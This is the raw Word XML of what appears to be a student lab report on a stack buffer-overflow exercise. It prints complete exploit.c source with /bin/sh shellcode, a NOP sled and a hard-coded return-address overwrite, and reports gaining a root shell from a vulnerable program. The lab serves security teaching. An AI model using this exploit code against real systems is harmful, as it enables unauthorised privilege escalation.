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73A4" w14:textId="44D368CB" w:rsidR="004C616C" w:rsidRDefault="00D92259">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Turning Off Countermeasures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE92DA1" w14:textId="28E753B8" w:rsidR="00D92259" w:rsidRDefault="00254120">
      <w:r w:rsidRPr="00254120">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D839242" wp14:editId="109B4D90">
            <wp:extent cx="5943600" cy="978535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1886925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25962" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="978535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="310B6167" w14:textId="533CBAEF" w:rsidR="00254120" w:rsidRDefault="00F7778B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 1: Running Shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0597C47B" w14:textId="5E2FC459" w:rsidR="00142534" w:rsidRPr="00DC77E4" w:rsidRDefault="00DC77E4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>call_shellcode.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> compiled to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>call_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E4072B4" w14:textId="574F4E58" w:rsidR="00F7778B" w:rsidRDefault="00142534">
      <w:r w:rsidRPr="00142534">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="187D588B" wp14:editId="56AA34E6">
            <wp:extent cx="5943600" cy="1879600"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="16543439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43986" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1879600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D867424" w14:textId="4C17EBFB" w:rsidR="00DC77E4" w:rsidRDefault="00E64E8B">
      <w:r>
        <w:t>Compiling the program with buffer size 160</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E3A73" w14:textId="47425575" w:rsidR="000E444E" w:rsidRDefault="00894C5A">
      <w:r w:rsidRPr="00894C5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D232116" wp14:editId="3953C5A7">
            <wp:extent cx="5943600" cy="1171575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1305391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91618" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1171575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5A5401" w14:textId="4F941463" w:rsidR="00D26EB8" w:rsidRDefault="000E444E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2: </w:t>
      </w:r>
      <w:r w:rsidR="00D26EB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE8B95" w14:textId="6F706A92" w:rsidR="00176DC7" w:rsidRPr="00176DC7" w:rsidRDefault="00176DC7">
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to gain more information on the program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3703723D" w14:textId="4A3AAB4D" w:rsidR="000008CA" w:rsidRDefault="001A5D05">
      <w:r w:rsidRPr="001A5D05">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47CA9013" wp14:editId="0E7FB2D3">
            <wp:extent cx="5943600" cy="1812925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8489673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67347" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1812925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78285DA6" w14:textId="674D8EAF" w:rsidR="000008CA" w:rsidRDefault="001A5D05">
      <w:r>
        <w:t>168 + 4 = 172</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DB04AD" w14:textId="7459B8F6" w:rsidR="001A5D05" w:rsidRPr="00A10B26" w:rsidRDefault="0031015B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10B26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10B26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> program that creates the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10B26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF3127" w:rsidRPr="00A10B26">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (bold part is what additionally was added)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F835A3D" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">/* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D29BB9C" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127"/>
    <w:p w14:paraId="450F4DA0" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t>/* A program that creates a file containing code for launching shell*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7721DA00" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B51AE6" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D5CEC9" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536AB7B4" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t>char shellcode[]=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4016678E" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\x31\xc0"             /* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xorl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">    %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">              */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368F9365" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\x50"                 /* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pushl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">                   */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D16573E" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\x68""//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">"           /* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pushl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   $0x68732f2f            */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1DBF4A" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\x68""/bin"           /* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pushl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   $0x6e69622f            */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19404497" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\x89\xe3"             /* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>movl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">    %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">              */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51940C00" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\x50"                 /* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pushl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">                   */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D5037" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\x53"                 /* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pushl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">                   */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291B1D42" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\x89\xe1"             /* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>movl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">    %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">              */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E2733" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\x99"                 /* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cdq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">                            */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B72882C" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\xb0\x0b"             /* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>movb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">    $0x0b,%al              */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DEE61D" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x80"             /* int     $0x80                  */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092EB01E" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F27309C" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127"/>
    <w:p w14:paraId="7D80B5F9" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">void main(int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>argc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, char **</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD20179" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8F6E14" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    char buffer[517</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="757EB70D" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    FILE *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="194159FF" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127"/>
    <w:p w14:paraId="7B26513E" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    /* Initialize buffer with 0x90 (NOP instruction) */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0807ADEA" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>memset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(&amp;buffer, 0x90, 517</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="29A79D2F" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127"/>
    <w:p w14:paraId="1E45F03D" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRPr="00307436" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    /* You need to fill the buffer with appropriate contents here */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1E17AB" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRPr="00307436" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    *((long *)(buffer+172))=0xbfffeac8+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00307436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x88;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="297EEE36" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRPr="00307436" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00307436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    memcpy(buffer+sizeof(buffer)-sizeof(shellcode),shellcode,sizeof(shellcode)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00307436">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="69DEC52C" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127"/>
    <w:p w14:paraId="223F28BD" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    /* Save the contents to the file "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0AA8E2" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "w"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6FFDD837" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(buffer, 517, 1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="785CA865" w14:textId="77777777" w:rsidR="00EF3127" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fclose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="577B8F49" w14:textId="15B5129F" w:rsidR="0031015B" w:rsidRDefault="00EF3127" w:rsidP="00EF3127">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034B401C" w14:textId="77777777" w:rsidR="00307436" w:rsidRDefault="00307436" w:rsidP="00EF3127"/>
    <w:p w14:paraId="3590A996" w14:textId="2D7109C7" w:rsidR="004E5F7C" w:rsidRDefault="00307436" w:rsidP="00B47C59">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> generation</w:t>
      </w:r>
      <w:r w:rsidR="00B47C59">
        <w:t xml:space="preserve"> using exploit and then gaining root access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECEE737" w14:textId="703E2338" w:rsidR="00F70048" w:rsidRDefault="00F70048" w:rsidP="00B47C59">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o exploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22D69832" w14:textId="7FF16968" w:rsidR="00B47C59" w:rsidRDefault="00B47C59" w:rsidP="00B47C59">
      <w:r w:rsidRPr="00B47C59">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B65BC2E" wp14:editId="15BD8A6F">
            <wp:extent cx="5943600" cy="1322705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2827755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75505" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1322705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5990EBAB" w14:textId="12AF8A72" w:rsidR="00F34F6B" w:rsidRDefault="009322F2" w:rsidP="009322F2">
      <w:r>
        <w:t xml:space="preserve">The exploit and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> have successfully gained access to a shell at root </w:t>
      </w:r>
      <w:r w:rsidR="0040068D">
        <w:t xml:space="preserve">level. However, the real user id is still yourself, just the effective user ID is root as seen above. </w:t>
      </w:r>
      <w:r w:rsidR="00363400">
        <w:t>Using the exploit program and then executing stack, we were able to gain access to a shell with root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1B4995" w14:textId="77777777" w:rsidR="009322F2" w:rsidRDefault="009322F2" w:rsidP="009322F2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3574C2BC" w14:textId="77777777" w:rsidR="009322F2" w:rsidRDefault="009322F2" w:rsidP="009322F2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
